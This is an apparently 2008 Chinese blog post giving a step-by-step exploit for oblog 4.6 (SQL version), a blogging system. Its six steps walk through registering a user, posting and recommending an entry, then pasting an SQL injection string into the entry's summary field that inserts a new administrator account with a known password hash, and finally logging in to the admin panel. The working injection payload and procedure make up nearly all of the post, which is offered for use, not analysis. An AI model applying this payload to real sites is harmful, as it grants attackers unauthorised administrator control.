oblog4.6添加后台管理员漏洞(仅适用于sql版)

    [晴 September 11, 2008 09:48 | by !4p47hy ]
1、注册一个用户,用户名script,密码123456
2、发布一篇日志,日志标题:测试一下
3、个人前台首页找到日志"测试一下",点"推荐"
4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:
s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--

5、最后点"确认提交"按钮,如果提示修改成功,注入完成!
6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功!

转载请著明来源于0x54.com
Tags: , , , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(8619)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive